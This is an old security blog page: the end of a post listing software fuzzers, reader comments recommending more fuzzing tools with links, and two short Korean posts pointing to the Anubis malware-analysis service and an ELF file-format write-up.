    eFuzz - A generic TCP/IP protocol fuzzer. Easy to use, but maybe not as full featured as some others on this list.
    Peach Fuzzer - A great fuzzer written by Michael Eddington. Peach Fuzzer is more of a framework for building fuzzers.
    Fuzz - The ORIGINAL fuzzer developed by Dr. Barton Miller at my Alma Matter, the University of Wisconsin-Madison in 1990. Go badgers!

    Well, this is it for now. I'll be sure to add to this list. Email me with suggestions

    ~jack~

    jack ~a~ InfoSecInstitute.com

    15 Comments:

    • At 8:33 AM, Anonymous said…

      Hey Jack, here is a fuzzer for MSN messenger to add to the list:

      http://addict3d.org/index.php?page=viewarticle&type=security&ID=4687&title=Tiny%20MSN%20fuzzer%20(passwd%20demo)

    • At 3:04 PM, Scott said…

      There is a way to stop all that from happening. Theres s samll, but up and coming compnay that I have heard fo called
      multipleshiftkey.com

      The guy owns the compmay is name is Ray and he is got an awesome product that you should, at least, check out.

      www.multipleshiftkey.com
      Phone 909-816-8729

    • At 7:23 PM, Jamel L. Raines, Esq. said…

      Iam glad I found this blog. It came up on a google search. Iam a full time college student taking Information Security Management this semester. I will come here often to get a fresh perspective. to help keep me from becomming a knobologist.

      Jamel L. Raines, Esq.

    • At 2:47 PM, Juan Aurelio Naranjo said…

      Hi Jack! Here are some more fuzzers to add to the list:

      Fuzzball2 is a little fuzzer for TCP and IP options. It sends a bunch of more or less bogus packets to the host of your choice.

      Fuzzer version 1.1 is a multi protocol fuzzing tool written in Python. It can be used to find new SQL injection, format string, buffer overflow, directory traversal, and other vulnerabilities. Written with portability in mind.

      Scratch is an advanced protocol destroyer ("fuzzer") which can routinely find a wide variety of vulnerabilities from a simple packet. scratch does complex parsing of binary files to determine what to fuzz with what data. scratch also comes with a framework for fuzzing binary protocols such as SSL and SMB.

      Juan Aurelio Naranjo
      Reverse Labs
      http://www.reverselabs.com/

    • At 12:59 PM, Anonymous said…

      You might also want to check out the digital dwarf society website at http://www.digitaldwarf.be. It contains plenty of fault injection example code and working fuzzers.

    • At 12:15 PM, exceed said…

      Here's another one that works in Windows environment:

      http://software.tripbit.net/mistress/

    • At 5:30 PM, Anonymous said…

      A simple protocol fuzzer in perl: http://www.cirt.dk/tools/fuzzer/fuzzer.txt

    • At 5:19 AM, Juan Aurelio Naranjo said…

      You may want to check this entry from the Metasploit Blog: Browser Fuzzing for fun and Profit

      From the article we got more (ActiveX/COM) fuzzers to add to the list...

      AXFuzz A tool from Shane Hird for "fuzzing" the IDispatch interface of the components, as well as any IDispatch interfaces returned from the methods, by calling every method with garbage values, or overly long BSTRs.

      COMRaider David Zimmer of iDefense has released this tool designed to fuzz COM Object Interfaces. COMRaider includes:

      - capability to easily enumerate safe for scripting objects
      - ability to scan for COM objects by path, filename, or guid
      - integrated type library viewer
      - integrated debugger to monitor exceptions, close windows,log api
      - external vbs script allows you to easily edit fuzzer permutations
      - built in webserver to test exploits on the fly
      - distributed auditing mode to allow entire teams to work together
      - ability to upload crash files to central server for group analysis
      - automation tools allowing you to easily fuzz multiple libraries
      - individual classes, or specific functions.

      You can watch a video tour of COMRaider in http://labs.idefense.com/doDownload.php?downloadID=24

      Hamachi A community-developed utility for verifying browser integrity, written by H D Moore and Aviv Raff. Hamachi will look for common DHTML implementation flaws by specifying common "bad" values for method arguments and property values. Hamachi has found flaws in Firefox 1.0.7, Mozilla 1.7, Konqueror 3.5.1, Opera 8.5, Safari, and Internet Explorer!.

      Cheers

      Juan Aurelio Naranjo
      Reverse Labs

    • At 4:00 PM, Pk said…

    • At 1:04 PM, Tim said…

      WSFuzzer claims to test SOAP based web services.

      WSFuzzer

    • At 10:59 PM, Anonymous said…

      Anyone know if there is a fuzzing tool which is special for PDF fuzzing.

    • At 9:20 PM, Anonymous said…

      Hy there,

      Someone know a implementation of fuzzers to uncommon and OLD protocols/services? Like daytime, echo, rexec, rsh, etc ?

      Thank you

    • At 11:24 PM, Anonymous said…

      This company has a really cool fuzzer that I saw demo'ed at a conference. They call it a security analyzer, but I think it is a fuzzer that has a lot of automation built in.

      Definitely worth a look. Weird name though.

      www.musecurity.com

    • At 6:24 AM, Anonymous said…

      Scapy is one more addition.
      http://www.secdev.org/projects/scapy/

    • At 9:05 AM, Anonymous said…

      Here is a more recent fuzzer that automates the whole process :

      http://sourceforge.net/projects/jbrofuzz

      The current version supports a more robust set of generations, including basic cross site scripting checks (XSS) as well as basic SQL injection. A number of tests involving buffer overflows (BFO), format string errors (FSE) as well as integer overflows (INT) have been added. Also, a separate panel is present showing the definitions for each and actually what a generator performs.

    Trackbacks 0 : Comments 0

    Write a comment


    Anubis: Analyzing Unknown Binaries

    ┏ Analysis 2007.10.12 04:07

    anubis는 악성코드를 분석해주는 서비스이다. 윈도우 실행파일을 제출하면 분석보고서를 받는다. anubis는 아직 테스트단계이다. 에러나 버그가 있을지도 모르니 양해를 바란다.

    http://analysis.seclab.tuwien.ac.at/

    Trackbacks 0 : Comments 0

    Write a comment


    ELF 파일 포맷분석

    ┏ Analysis 2007.10.07 15:41

    출처 : http://vsstar.egloos.com/1470313

    중앙대학교의 정경진님이 작성하신 ELF파일포맷분석입니다.

    한글로 써져있으니..접하기 쉬우실 듯 합니다..:)

    P.S : 문제가 발생될 것으로 판단되면 삭제하겠습니다.

    Trackbacks 0 : Comments 0

    Write a comment